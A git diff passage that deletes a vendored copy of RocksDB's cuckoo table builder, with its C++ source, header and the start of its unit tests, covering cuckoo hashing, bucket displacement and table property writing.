-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder.cc b/thirdparty/rocksdb/table/cuckoo_table_builder.cc
deleted file mode 100644
index e3ed314..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder.cc
+++ /dev/null
@@ -1,515 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/cuckoo_table_builder.h"
-
-#include <assert.h>
-#include <algorithm>
-#include <limits>
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "table/block_builder.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "util/autovector.h"
-#include "util/file_reader_writer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-const std::string CuckooTablePropertyNames::kEmptyKey =
-      "rocksdb.cuckoo.bucket.empty.key";
-const std::string CuckooTablePropertyNames::kNumHashFunc =
-      "rocksdb.cuckoo.hash.num";
-const std::string CuckooTablePropertyNames::kHashTableSize =
-      "rocksdb.cuckoo.hash.size";
-const std::string CuckooTablePropertyNames::kValueLength =
-      "rocksdb.cuckoo.value.length";
-const std::string CuckooTablePropertyNames::kIsLastLevel =
-      "rocksdb.cuckoo.file.islastlevel";
-const std::string CuckooTablePropertyNames::kCuckooBlockSize =
-      "rocksdb.cuckoo.hash.cuckooblocksize";
-const std::string CuckooTablePropertyNames::kIdentityAsFirstHash =
-      "rocksdb.cuckoo.hash.identityfirst";
-const std::string CuckooTablePropertyNames::kUseModuleHash =
-      "rocksdb.cuckoo.hash.usemodule";
-const std::string CuckooTablePropertyNames::kUserKeyLength =
-      "rocksdb.cuckoo.hash.userkeylength";
-
-// Obtained by running echo rocksdb.table.cuckoo | sha1sum
-extern const uint64_t kCuckooTableMagicNumber = 0x926789d0c5f17873ull;
-
-CuckooTableBuilder::CuckooTableBuilder(
-    WritableFileWriter* file, double max_hash_table_ratio,
-    uint32_t max_num_hash_table, uint32_t max_search_depth,
-    const Comparator* user_comparator, uint32_t cuckoo_block_size,
-    bool use_module_hash, bool identity_as_first_hash,
-    uint64_t (*get_slice_hash)(const Slice&, uint32_t, uint64_t),
-    uint32_t column_family_id, const std::string& column_family_name)
-    : num_hash_func_(2),
-      file_(file),
-      max_hash_table_ratio_(max_hash_table_ratio),
-      max_num_hash_func_(max_num_hash_table),
-      max_search_depth_(max_search_depth),
-      cuckoo_block_size_(std::max(1U, cuckoo_block_size)),
-      hash_table_size_(use_module_hash ? 0 : 2),
-      is_last_level_file_(false),
-      has_seen_first_key_(false),
-      has_seen_first_value_(false),
-      key_size_(0),
-      value_size_(0),
-      num_entries_(0),
-      num_values_(0),
-      ucomp_(user_comparator),
-      use_module_hash_(use_module_hash),
-      identity_as_first_hash_(identity_as_first_hash),
-      get_slice_hash_(get_slice_hash),
-      closed_(false) {
-  // Data is in a huge block.
-  properties_.num_data_blocks = 1;
-  properties_.index_size = 0;
-  properties_.filter_size = 0;
-  properties_.column_family_id = column_family_id;
-  properties_.column_family_name = column_family_name;
-}
-
-void CuckooTableBuilder::Add(const Slice& key, const Slice& value) {
-  if (num_entries_ >= kMaxVectorIdx - 1) {
-    status_ = Status::NotSupported("Number of keys in a file must be < 2^32-1");
-    return;
-  }
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    status_ = Status::Corruption("Unable to parse key into inernal key.");
-    return;
-  }
-  if (ikey.type != kTypeDeletion && ikey.type != kTypeValue) {
-    status_ = Status::NotSupported("Unsupported key type " +
-                                   ToString(ikey.type));
-    return;
-  }
-
-  // Determine if we can ignore the sequence number and value type from
-  // internal keys by looking at sequence number from first key. We assume
-  // that if first key has a zero sequence number, then all the remaining
-  // keys will have zero seq. no.
-  if (!has_seen_first_key_) {
-    is_last_level_file_ = ikey.sequence == 0;
-    has_seen_first_key_ = true;
-    smallest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-    largest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-    key_size_ = is_last_level_file_ ? ikey.user_key.size() : key.size();
-  }
-  if (key_size_ != (is_last_level_file_ ? ikey.user_key.size() : key.size())) {
-    status_ = Status::NotSupported("all keys have to be the same size");
-    return;
-  }
-
-  if (ikey.type == kTypeValue) {
-    if (!has_seen_first_value_) {
-      has_seen_first_value_ = true;
-      value_size_ = value.size();
-    }
-    if (value_size_ != value.size()) {
-      status_ = Status::NotSupported("all values have to be the same size");
-      return;
-    }
-
-    if (is_last_level_file_) {
-      kvs_.append(ikey.user_key.data(), ikey.user_key.size());
-    } else {
-      kvs_.append(key.data(), key.size());
-    }
-    kvs_.append(value.data(), value.size());
-    ++num_values_;
-  } else {
-    if (is_last_level_file_) {
-      deleted_keys_.append(ikey.user_key.data(), ikey.user_key.size());
-    } else {
-      deleted_keys_.append(key.data(), key.size());
-    }
-  }
-  ++num_entries_;
-
-  // In order to fill the empty buckets in the hash table, we identify a
-  // key which is not used so far (unused_user_key). We determine this by
-  // maintaining smallest and largest keys inserted so far in bytewise order
-  // and use them to find a key outside this range in Finish() operation.
-  // Note that this strategy is independent of user comparator used here.
-  if (ikey.user_key.compare(smallest_user_key_) < 0) {
-    smallest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-  } else if (ikey.user_key.compare(largest_user_key_) > 0) {
-    largest_user_key_.assign(ikey.user_key.data(), ikey.user_key.size());
-  }
-  if (!use_module_hash_) {
-    if (hash_table_size_ < num_entries_ / max_hash_table_ratio_) {
-      hash_table_size_ *= 2;
-    }
-  }
-}
-
-bool CuckooTableBuilder::IsDeletedKey(uint64_t idx) const {
-  assert(closed_);
-  return idx >= num_values_;
-}
-
-Slice CuckooTableBuilder::GetKey(uint64_t idx) const {
-  assert(closed_);
-  if (IsDeletedKey(idx)) {
-    return Slice(&deleted_keys_[(idx - num_values_) * key_size_], key_size_);
-  }
-  return Slice(&kvs_[idx * (key_size_ + value_size_)], key_size_);
-}
-
-Slice CuckooTableBuilder::GetUserKey(uint64_t idx) const {
-  assert(closed_);
-  return is_last_level_file_ ? GetKey(idx) : ExtractUserKey(GetKey(idx));
-}
-
-Slice CuckooTableBuilder::GetValue(uint64_t idx) const {
-  assert(closed_);
-  if (IsDeletedKey(idx)) {
-    static std::string empty_value(value_size_, 'a');
-    return Slice(empty_value);
-  }
-  return Slice(&kvs_[idx * (key_size_ + value_size_) + key_size_], value_size_);
-}
-
-Status CuckooTableBuilder::MakeHashTable(std::vector<CuckooBucket>* buckets) {
-  buckets->resize(hash_table_size_ + cuckoo_block_size_ - 1);
-  uint32_t make_space_for_key_call_id = 0;
-  for (uint32_t vector_idx = 0; vector_idx < num_entries_; vector_idx++) {
-    uint64_t bucket_id;
-    bool bucket_found = false;
-    autovector<uint64_t> hash_vals;
-    Slice user_key = GetUserKey(vector_idx);
-    for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_ && !bucket_found;
-        ++hash_cnt) {
-      uint64_t hash_val = CuckooHash(user_key, hash_cnt, use_module_hash_,
-          hash_table_size_, identity_as_first_hash_, get_slice_hash_);
-      // If there is a collision, check next cuckoo_block_size_ locations for
-      // empty locations. While checking, if we reach end of the hash table,
-      // stop searching and proceed for next hash function.
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++hash_val) {
-        if ((*buckets)[hash_val].vector_idx == kMaxVectorIdx) {
-          bucket_id = hash_val;
-          bucket_found = true;
-          break;
-        } else {
-          if (ucomp_->Compare(user_key,
-                GetUserKey((*buckets)[hash_val].vector_idx)) == 0) {
-            return Status::NotSupported("Same key is being inserted again.");
-          }
-          hash_vals.push_back(hash_val);
-        }
-      }
-    }
-    while (!bucket_found && !MakeSpaceForKey(hash_vals,
-          ++make_space_for_key_call_id, buckets, &bucket_id)) {
-      // Rehash by increashing number of hash tables.
-      if (num_hash_func_ >= max_num_hash_func_) {
-        return Status::NotSupported("Too many collisions. Unable to hash.");
-      }
-      // We don't really need to rehash the entire table because old hashes are
-      // still valid and we only increased the number of hash functions.
-      uint64_t hash_val = CuckooHash(user_key, num_hash_func_, use_module_hash_,
-          hash_table_size_, identity_as_first_hash_, get_slice_hash_);
-      ++num_hash_func_;
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++hash_val) {
-        if ((*buckets)[hash_val].vector_idx == kMaxVectorIdx) {
-          bucket_found = true;
-          bucket_id = hash_val;
-          break;
-        } else {
-          hash_vals.push_back(hash_val);
-        }
-      }
-    }
-    (*buckets)[bucket_id].vector_idx = vector_idx;
-  }
-  return Status::OK();
-}
-
-Status CuckooTableBuilder::Finish() {
-  assert(!closed_);
-  closed_ = true;
-  std::vector<CuckooBucket> buckets;
-  Status s;
-  std::string unused_bucket;
-  if (num_entries_ > 0) {
-    // Calculate the real hash size if module hash is enabled.
-    if (use_module_hash_) {
-      hash_table_size_ =
-        static_cast<uint64_t>(num_entries_ / max_hash_table_ratio_);
-    }
-    s = MakeHashTable(&buckets);
-    if (!s.ok()) {
-      return s;
-    }
-    // Determine unused_user_key to fill empty buckets.
-    std::string unused_user_key = smallest_user_key_;
-    int curr_pos = static_cast<int>(unused_user_key.size()) - 1;
-    while (curr_pos >= 0) {
-      --unused_user_key[curr_pos];
-      if (Slice(unused_user_key).compare(smallest_user_key_) < 0) {
-        break;
-      }
-      --curr_pos;
-    }
-    if (curr_pos < 0) {
-      // Try using the largest key to identify an unused key.
-      unused_user_key = largest_user_key_;
-      curr_pos = static_cast<int>(unused_user_key.size()) - 1;
-      while (curr_pos >= 0) {
-        ++unused_user_key[curr_pos];
-        if (Slice(unused_user_key).compare(largest_user_key_) > 0) {
-          break;
-        }
-        --curr_pos;
-      }
-    }
-    if (curr_pos < 0) {
-      return Status::Corruption("Unable to find unused key");
-    }
-    if (is_last_level_file_) {
-      unused_bucket = unused_user_key;
-    } else {
-      ParsedInternalKey ikey(unused_user_key, 0, kTypeValue);
-      AppendInternalKey(&unused_bucket, ikey);
-    }
-  }
-  properties_.num_entries = num_entries_;
-  properties_.fixed_key_len = key_size_;
-  properties_.user_collected_properties[
-        CuckooTablePropertyNames::kValueLength].assign(
-        reinterpret_cast<const char*>(&value_size_), sizeof(value_size_));
-
-  uint64_t bucket_size = key_size_ + value_size_;
-  unused_bucket.resize(bucket_size, 'a');
-  // Write the table.
-  uint32_t num_added = 0;
-  for (auto& bucket : buckets) {
-    if (bucket.vector_idx == kMaxVectorIdx) {
-      s = file_->Append(Slice(unused_bucket));
-    } else {
-      ++num_added;
-      s = file_->Append(GetKey(bucket.vector_idx));
-      if (s.ok()) {
-        if (value_size_ > 0) {
-          s = file_->Append(GetValue(bucket.vector_idx));
-        }
-      }
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  assert(num_added == NumEntries());
-  properties_.raw_key_size = num_added * properties_.fixed_key_len;
-  properties_.raw_value_size = num_added * value_size_;
-
-  uint64_t offset = buckets.size() * bucket_size;
-  properties_.data_size = offset;
-  unused_bucket.resize(properties_.fixed_key_len);
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kEmptyKey] = unused_bucket;
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kNumHashFunc].assign(
-        reinterpret_cast<char*>(&num_hash_func_), sizeof(num_hash_func_));
-
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kHashTableSize].assign(
-        reinterpret_cast<const char*>(&hash_table_size_),
-        sizeof(hash_table_size_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kIsLastLevel].assign(
-        reinterpret_cast<const char*>(&is_last_level_file_),
-        sizeof(is_last_level_file_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kCuckooBlockSize].assign(
-        reinterpret_cast<const char*>(&cuckoo_block_size_),
-        sizeof(cuckoo_block_size_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kIdentityAsFirstHash].assign(
-        reinterpret_cast<const char*>(&identity_as_first_hash_),
-        sizeof(identity_as_first_hash_));
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kUseModuleHash].assign(
-        reinterpret_cast<const char*>(&use_module_hash_),
-        sizeof(use_module_hash_));
-  uint32_t user_key_len = static_cast<uint32_t>(smallest_user_key_.size());
-  properties_.user_collected_properties[
-    CuckooTablePropertyNames::kUserKeyLength].assign(
-        reinterpret_cast<const char*>(&user_key_len),
-        sizeof(user_key_len));
-
-  // Write meta blocks.
-  MetaIndexBuilder meta_index_builder;
-  PropertyBlockBuilder property_block_builder;
-
-  property_block_builder.AddTableProperty(properties_);
-  property_block_builder.Add(properties_.user_collected_properties);
-  Slice property_block = property_block_builder.Finish();
-  BlockHandle property_block_handle;
-  property_block_handle.set_offset(offset);
-  property_block_handle.set_size(property_block.size());
-  s = file_->Append(property_block);
-  offset += property_block.size();
-  if (!s.ok()) {
-    return s;
-  }
-
-  meta_index_builder.Add(kPropertiesBlock, property_block_handle);
-  Slice meta_index_block = meta_index_builder.Finish();
-
-  BlockHandle meta_index_block_handle;
-  meta_index_block_handle.set_offset(offset);
-  meta_index_block_handle.set_size(meta_index_block.size());
-  s = file_->Append(meta_index_block);
-  if (!s.ok()) {
-    return s;
-  }
-
-  Footer footer(kCuckooTableMagicNumber, 1);
-  footer.set_metaindex_handle(meta_index_block_handle);
-  footer.set_index_handle(BlockHandle::NullBlockHandle());
-  std::string footer_encoding;
-  footer.EncodeTo(&footer_encoding);
-  s = file_->Append(footer_encoding);
-  return s;
-}
-
-void CuckooTableBuilder::Abandon() {
-  assert(!closed_);
-  closed_ = true;
-}
-
-uint64_t CuckooTableBuilder::NumEntries() const {
-  return num_entries_;
-}
-
-uint64_t CuckooTableBuilder::FileSize() const {
-  if (closed_) {
-    return file_->GetFileSize();
-  } else if (num_entries_ == 0) {
-    return 0;
-  }
-
-  if (use_module_hash_) {
-    return static_cast<uint64_t>((key_size_ + value_size_) *
-        num_entries_ / max_hash_table_ratio_);
-  } else {
-    // Account for buckets being a power of two.
-    // As elements are added, file size remains constant for a while and
-    // doubles its size. Since compaction algorithm stops adding elements
-    // only after it exceeds the file limit, we account for the extra element
-    // being added here.
-    uint64_t expected_hash_table_size = hash_table_size_;
-    if (expected_hash_table_size < (num_entries_ + 1) / max_hash_table_ratio_) {
-      expected_hash_table_size *= 2;
-    }
-    return (key_size_ + value_size_) * expected_hash_table_size - 1;
-  }
-}
-
-// This method is invoked when there is no place to insert the target key.
-// It searches for a set of elements that can be moved to accommodate target
-// key. The search is a BFS graph traversal with first level (hash_vals)
-// being all the buckets target key could go to.
-// Then, from each node (curr_node), we find all the buckets that curr_node
-// could go to. They form the children of curr_node in the tree.
-// We continue the traversal until we find an empty bucket, in which case, we
-// move all elements along the path from first level to this empty bucket, to
-// make space for target key which is inserted at first level (*bucket_id).
-// If tree depth exceedes max depth, we return false indicating failure.
-bool CuckooTableBuilder::MakeSpaceForKey(
-    const autovector<uint64_t>& hash_vals,
-    const uint32_t make_space_for_key_call_id,
-    std::vector<CuckooBucket>* buckets, uint64_t* bucket_id) {
-  struct CuckooNode {
-    uint64_t bucket_id;
-    uint32_t depth;
-    uint32_t parent_pos;
-    CuckooNode(uint64_t _bucket_id, uint32_t _depth, int _parent_pos)
-        : bucket_id(_bucket_id), depth(_depth), parent_pos(_parent_pos) {}
-  };
-  // This is BFS search tree that is stored simply as a vector.
-  // Each node stores the index of parent node in the vector.
-  std::vector<CuckooNode> tree;
-  // We want to identify already visited buckets in the current method call so
-  // that we don't add same buckets again for exploration in the tree.
-  // We do this by maintaining a count of current method call in
-  // make_space_for_key_call_id, which acts as a unique id for this invocation
-  // of the method. We store this number into the nodes that we explore in
-  // current method call.
-  // It is unlikely for the increment operation to overflow because the maximum
-  // no. of times this will be called is <= max_num_hash_func_ + num_entries_.
-  for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) {
-    uint64_t bid = hash_vals[hash_cnt];
-    (*buckets)[bid].make_space_for_key_call_id = make_space_for_key_call_id;
-    tree.push_back(CuckooNode(bid, 0, 0));
-  }
-  bool null_found = false;
-  uint32_t curr_pos = 0;
-  while (!null_found && curr_pos < tree.size()) {
-    CuckooNode& curr_node = tree[curr_pos];
-    uint32_t curr_depth = curr_node.depth;
-    if (curr_depth >= max_search_depth_) {
-      break;
-    }
-    CuckooBucket& curr_bucket = (*buckets)[curr_node.bucket_id];
-    for (uint32_t hash_cnt = 0;
-        hash_cnt < num_hash_func_ && !null_found; ++hash_cnt) {
-      uint64_t child_bucket_id = CuckooHash(GetUserKey(curr_bucket.vector_idx),
-          hash_cnt, use_module_hash_, hash_table_size_, identity_as_first_hash_,
-          get_slice_hash_);
-      // Iterate inside Cuckoo Block.
-      for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-          ++block_idx, ++child_bucket_id) {
-        if ((*buckets)[child_bucket_id].make_space_for_key_call_id ==
-            make_space_for_key_call_id) {
-          continue;
-        }
-        (*buckets)[child_bucket_id].make_space_for_key_call_id =
-          make_space_for_key_call_id;
-        tree.push_back(CuckooNode(child_bucket_id, curr_depth + 1,
-              curr_pos));
-        if ((*buckets)[child_bucket_id].vector_idx == kMaxVectorIdx) {
-          null_found = true;
-          break;
-        }
-      }
-    }
-    ++curr_pos;
-  }
-
-  if (null_found) {
-    // There is an empty node in tree.back(). Now, traverse the path from this
-    // empty node to top of the tree and at every node in the path, replace
-    // child with the parent. Stop when first level is reached in the tree
-    // (happens when 0 <= bucket_to_replace_pos < num_hash_func_) and return
-    // this location in first level for target key to be inserted.
-    uint32_t bucket_to_replace_pos = static_cast<uint32_t>(tree.size()) - 1;
-    while (bucket_to_replace_pos >= num_hash_func_) {
-      CuckooNode& curr_node = tree[bucket_to_replace_pos];
-      (*buckets)[curr_node.bucket_id] =
-        (*buckets)[tree[curr_node.parent_pos].bucket_id];
-      bucket_to_replace_pos = curr_node.parent_pos;
-    }
-    *bucket_id = tree[bucket_to_replace_pos].bucket_id;
-  }
-  return null_found;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder.h b/thirdparty/rocksdb/table/cuckoo_table_builder.h
deleted file mode 100644
index 3829541..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder.h
+++ /dev/null
@@ -1,127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <stdint.h>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-#include "port/port.h"
-#include "rocksdb/status.h"
-#include "table/table_builder.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class CuckooTableBuilder: public TableBuilder {
- public:
-  CuckooTableBuilder(WritableFileWriter* file, double max_hash_table_ratio,
-                     uint32_t max_num_hash_func, uint32_t max_search_depth,
-                     const Comparator* user_comparator,
-                     uint32_t cuckoo_block_size, bool use_module_hash,
-                     bool identity_as_first_hash,
-                     uint64_t (*get_slice_hash)(const Slice&, uint32_t,
-                                                uint64_t),
-                     uint32_t column_family_id,
-                     const std::string& column_family_name);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~CuckooTableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override { return status_; }
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  TableProperties GetTableProperties() const override { return properties_; }
-
- private:
-  struct CuckooBucket {
-    CuckooBucket()
-      : vector_idx(kMaxVectorIdx), make_space_for_key_call_id(0) {}
-    uint32_t vector_idx;
-    // This number will not exceed kvs_.size() + max_num_hash_func_.
-    // We assume number of items is <= 2^32.
-    uint32_t make_space_for_key_call_id;
-  };
-  static const uint32_t kMaxVectorIdx = port::kMaxInt32;
-
-  bool MakeSpaceForKey(const autovector<uint64_t>& hash_vals,
-                       const uint32_t call_id,
-                       std::vector<CuckooBucket>* buckets, uint64_t* bucket_id);
-  Status MakeHashTable(std::vector<CuckooBucket>* buckets);
-
-  inline bool IsDeletedKey(uint64_t idx) const;
-  inline Slice GetKey(uint64_t idx) const;
-  inline Slice GetUserKey(uint64_t idx) const;
-  inline Slice GetValue(uint64_t idx) const;
-
-  uint32_t num_hash_func_;
-  WritableFileWriter* file_;
-  const double max_hash_table_ratio_;
-  const uint32_t max_num_hash_func_;
-  const uint32_t max_search_depth_;
-  const uint32_t cuckoo_block_size_;
-  uint64_t hash_table_size_;
-  bool is_last_level_file_;
-  bool has_seen_first_key_;
-  bool has_seen_first_value_;
-  uint64_t key_size_;
-  uint64_t value_size_;
-  // A list of fixed-size key-value pairs concatenating into a string.
-  // Use GetKey(), GetUserKey(), and GetValue() to retrieve a specific
-  // key / value given an index
-  std::string kvs_;
-  std::string deleted_keys_;
-  // Number of key-value pairs stored in kvs_ + number of deleted keys
-  uint64_t num_entries_;
-  // Number of keys that contain value (non-deletion op)
-  uint64_t num_values_;
-  Status status_;
-  TableProperties properties_;
-  const Comparator* ucomp_;
-  bool use_module_hash_;
-  bool identity_as_first_hash_;
-  uint64_t (*get_slice_hash_)(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets);
-  std::string largest_user_key_ = "";
-  std::string smallest_user_key_ = "";
-
-  bool closed_;  // Either Finish() or Abandon() has been called.
-
-  // No copying allowed
-  CuckooTableBuilder(const CuckooTableBuilder&) = delete;
-  void operator=(const CuckooTableBuilder&) = delete;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc b/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc
deleted file mode 100644
index 93daaca..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_builder_test.cc
+++ /dev/null
@@ -1,632 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include <string>
-#include <map>
-#include <utility>
-
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-extern const uint64_t kCuckooTableMagicNumber;
-
-namespace {
-std::unordered_map<std::string, std::vector<uint64_t>> hash_map;
-
-uint64_t GetSliceHash(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets) {
-  return hash_map[s.ToString()][index];
-}
-}  // namespace
-
-class CuckooBuilderTest : public testing::Test {
- public:
-  CuckooBuilderTest() {
-    env_ = Env::Default();
-    Options options;
-    options.allow_mmap_reads = true;
-    env_options_ = EnvOptions(options);
-  }
-
-  void CheckFileContents(const std::vector<std::string>& keys,
-      const std::vector<std::string>& values,
-      const std::vector<uint64_t>& expected_locations,
-      std::string expected_unused_bucket, uint64_t expected_table_size,
-      uint32_t expected_num_hash_func, bool expected_is_last_level,
-      uint32_t expected_cuckoo_block_size = 1) {
-    // Read file
-    unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &read_file, env_options_));
-    uint64_t read_file_size;
-    ASSERT_OK(env_->GetFileSize(fname, &read_file_size));
-
-	  Options options;
-	  options.allow_mmap_reads = true;
-	  ImmutableCFOptions ioptions(options);
-
-    // Assert Table Properties.
-    TableProperties* props = nullptr;
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    ASSERT_OK(ReadTableProperties(file_reader.get(), read_file_size,
-                                  kCuckooTableMagicNumber, ioptions,
-                                  &props));
-    // Check unused bucket.
-    std::string unused_key = props->user_collected_properties[
-      CuckooTablePropertyNames::kEmptyKey];
-    ASSERT_EQ(expected_unused_bucket.substr(0,
-          props->fixed_key_len), unused_key);
-
-    uint64_t value_len_found =
-      *reinterpret_cast<const uint64_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kValueLength].data());
-    ASSERT_EQ(values.empty() ? 0 : values[0].size(), value_len_found);
-    ASSERT_EQ(props->raw_value_size, values.size()*value_len_found);
-    const uint64_t table_size =
-      *reinterpret_cast<const uint64_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kHashTableSize].data());
-    ASSERT_EQ(expected_table_size, table_size);
-    const uint32_t num_hash_func_found =
-      *reinterpret_cast<const uint32_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kNumHashFunc].data());
-    ASSERT_EQ(expected_num_hash_func, num_hash_func_found);
-    const uint32_t cuckoo_block_size =
-      *reinterpret_cast<const uint32_t*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kCuckooBlockSize].data());
-    ASSERT_EQ(expected_cuckoo_block_size, cuckoo_block_size);
-    const bool is_last_level_found =
-      *reinterpret_cast<const bool*>(props->user_collected_properties[
-                CuckooTablePropertyNames::kIsLastLevel].data());
-    ASSERT_EQ(expected_is_last_level, is_last_level_found);
-
-    ASSERT_EQ(props->num_entries, keys.size());
-    ASSERT_EQ(props->fixed_key_len, keys.empty() ? 0 : keys[0].size());
-    ASSERT_EQ(props->data_size, expected_unused_bucket.size() *
-        (expected_table_size + expected_cuckoo_block_size - 1));
-    ASSERT_EQ(props->raw_key_size, keys.size()*props->fixed_key_len);
-    ASSERT_EQ(props->column_family_id, 0);
-    ASSERT_EQ(props->column_family_name, kDefaultColumnFamilyName);
-    delete props;
-
-    // Check contents of the bucket.
-    std::vector<bool> keys_found(keys.size(), false);
-    size_t bucket_size = expected_unused_bucket.size();
-    for (uint32_t i = 0; i < table_size + cuckoo_block_size - 1; ++i) {
-      Slice read_slice;
-      ASSERT_OK(file_reader->Read(i * bucket_size, bucket_size, &read_slice,
-                                  nullptr));
-      size_t key_idx =
-          std::find(expected_locations.begin(), expected_locations.end(), i) -
-          expected_locations.begin();
-      if (key_idx == keys.size()) {
-        // i is not one of the expected locations. Empty bucket.
-        if (read_slice.data() == nullptr) {
-          ASSERT_EQ(0, expected_unused_bucket.size());
-        } else {
-          ASSERT_EQ(read_slice.compare(expected_unused_bucket), 0);
-        }
-      } else {
-        keys_found[key_idx] = true;
-        ASSERT_EQ(read_slice.compare(keys[key_idx] + values[key_idx]), 0);
-      }
-    }
-    for (auto key_found : keys_found) {
-      // Check that all keys wereReader found.
-      ASSERT_TRUE(key_found);
-    }
-  }
-
-  std::string GetInternalKey(Slice user_key, bool zero_seqno) {
-    IterKey ikey;
-    ikey.SetInternalKey(user_key, zero_seqno ? 0 : 1000, kTypeValue);
-    return ikey.GetInternalKey().ToString();
-  }
-
-  uint64_t NextPowOf2(uint64_t num) {
-    uint64_t n = 2;
-    while (n <= num) {
-      n *= 2;
-    }
-    return n;
-  }
-
-  uint64_t GetExpectedTableSize(uint64_t num) {
-    return NextPowOf2(static_cast<uint64_t>(num / kHashTableRatio));
-  }
-
-
-  Env* env_;
-  EnvOptions env_options_;
-  std::string fname;
-  const double kHashTableRatio = 0.9;
-};
-
-TEST_F(CuckooBuilderTest, SuccessWithEmptyFile) {
-  unique_ptr<WritableFile> writable_file;
-  fname = test::TmpDir() + "/EmptyFile";
-  ASSERT_OK(env_->NewWritableFile(fname, &writable_file, env_options_));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), EnvOptions()));
-  CuckooTableBuilder builder(file_writer.get(), kHashTableRatio, 4, 100,
-                             BytewiseComparator(), 1, false, false,
-                             GetSliceHash, 0 /* column_family_id */,
-                             kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  ASSERT_EQ(0UL, builder.FileSize());
-  ASSERT_OK(builder.Finish());
-  ASSERT_OK(file_writer->Close());
-  CheckFileContents({}, {}, {}, "", 2, 2, false);
-}
-
-TEST_F(CuckooBuilderTest, WriteSuccessNoCollisionFullKey) {
-  uint32_t num_hash_fun = 4;
-  std::vector<std::string> user_keys = {"key01", "key02", "key03", "key04"};
-  std::vector<std::string> values = {"v01", "v02", "v03", "v04"};
-  // Need to have a temporary variable here as VS compiler does not currently
-  // support operator= with initializer_list as a parameter
-  std::unordered_map<std::string, std::vector<uint64_t>> hm = {
-      {user_keys[0], {0, 1, 2, 3}},
-      {user_keys[1], {1, 2, 3, 4}},
-      {user_keys[2], {2, 3, 4, 5}},
-      {user_keys[3], {3, 4, 5, 6}}};
-  hash_map = std::move(hm);
-
